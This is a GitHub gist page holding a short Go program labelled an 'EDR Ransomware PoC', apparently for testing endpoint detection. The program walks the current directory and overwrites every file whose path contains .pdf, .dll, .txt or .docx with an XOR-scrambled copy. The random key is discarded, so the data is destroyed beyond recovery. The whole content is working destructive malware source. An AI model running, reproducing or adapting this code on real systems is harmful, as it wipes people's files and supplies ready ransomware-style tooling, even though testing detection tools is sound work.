Skip to content

Instantly share code, notes, and snippets.

@pyperanger

pyperanger/ransonpoc.go

Created January 8, 2021 20:26
Show Gist options
  • Save pyperanger/f5505bedac4ae806c5ffb518280f7169 to your computer and use it in GitHub Desktop.
Save pyperanger/f5505bedac4ae806c5ffb518280f7169 to your computer and use it in GitHub Desktop.
Download ZIP
EDR Ransonware PoC
Raw
ransonpoc.go
package main
import (
"fmt"
"os"
"io/ioutil"
"path/filepath"
"strings"
"math/rand"
"time"
)
var (
exts = []string{".pdf", ".dll", ".txt", ".docx"}
)
func cExt(path string) bool {
for _, e := range exts {
if strings.Contains(path, e) {
return true
}
}
return false
}
func x0r(wA byte, wB byte) byte {
var by byte// := make([]byte, 1)
by = wA ^ wB
return by
}
func l0l0l0l0(cont []byte, chave []byte) []byte {
output := make([]byte, len(cont))
ki := 0
for ti := 0; ti < len(cont) ; ti++ {
if ki >= len(chave) {
ki = 0
}
output = append(output, x0r(cont[ti], chave[ki]))
ki++
}
return output
}
func gkey(nkey int) string {
rand.Seed(time.Now().UnixNano()) // less performance, but ..
var l = []rune("aBcdefggihao4c314nr616bcggflaiOUJDHAYdvAOCYTVCt3toafnuagn541")
m := make([]rune, nkey)
for i, _ := range m {
m[i] = l[rand.Intn(len(l))]
}
return string(m)
}
func shaaazam() int {
rand.Seed(time.Now().UnixNano())
return rand.Intn(50)+50
}
func krypt(path string){
fmt.Println("[*] 3ncrypt1ng: ",path)
var k = gkey(shaaazam())
fc, err := ioutil.ReadFile(path)
if err != nil {
return
}
ioutil.WriteFile(path, l0l0l0l0(fc, []byte(k)), 0644)
return
}
func hills(path string, info os.FileInfo, err error) error {
if err != nil {
return err
}
if !info.IsDir() && cExt(path) {
krypt(path)
}
return nil
}
func main() {
fmt.Println("[ EDR - R4ns0nw4r3 PoC ]")
time.Sleep(5 * time.Second)
err := filepath.Walk(".", hills)
if err != nil {
fmt.Println("some err but dont give a fuckkk")
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment